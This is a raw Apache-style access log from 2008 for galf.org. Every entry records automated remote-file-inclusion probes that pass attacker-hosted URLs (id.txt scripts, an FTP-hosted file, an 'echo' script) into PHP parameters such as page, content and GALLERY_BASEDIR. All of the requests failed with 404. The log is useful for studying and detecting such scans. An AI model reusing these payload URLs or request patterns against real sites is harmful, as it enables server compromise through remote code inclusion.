81.89.137.99 - - [06/Apr/2008:18:54:39 -0700] "GET /logs/access_070903.log/index.php?show=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.137.99 - - [06/Apr/2008:18:54:40 -0700] "GET /index.php?show=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:55:20 -0700] "GET /logs/access_080113.log/index.php?content=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:55:20 -0700] "GET /index.php?content=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:55:20 -0700] "GET /logs/index.php?content=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:55:28 -0700] "GET /logs/access_071210.log/default.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:55:28 -0700] "GET /default.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:55:29 -0700] "GET /logs/default.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:55:59 -0700] "GET /logs/access_080225.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:55:59 -0700] "GET /default.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:56:02 -0700] "GET /logs/access_080225.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:56:05 -0700] "GET /logs/access_071217.log/default.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:56:31 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:56:32 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:56:32 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:56:32 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:57:04 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:27 -0700] "GET /logs/access.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:27 -0700] "GET /index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:27 -0700] "GET /logs/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.9.37.130 - - [06/Apr/2008:18:57:28 -0700] "GET /index.php?template=http://family.kloetstra.com/genealogya/photos/headstones/errorlink/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
69.9.37.130 - - [06/Apr/2008:18:57:28 -0700] "GET /logs/index.php?template=http://family.kloetstra.com/genealogya/photos/headstones/errorlink/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:44 -0700] "GET /logs/access_071119.log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:44 -0700] "GET /template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:57:44 -0700] "GET /logs/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:58:07 -0700] "GET /logs/access_071231.log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:58:20 -0700] "GET /logs/access.log/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org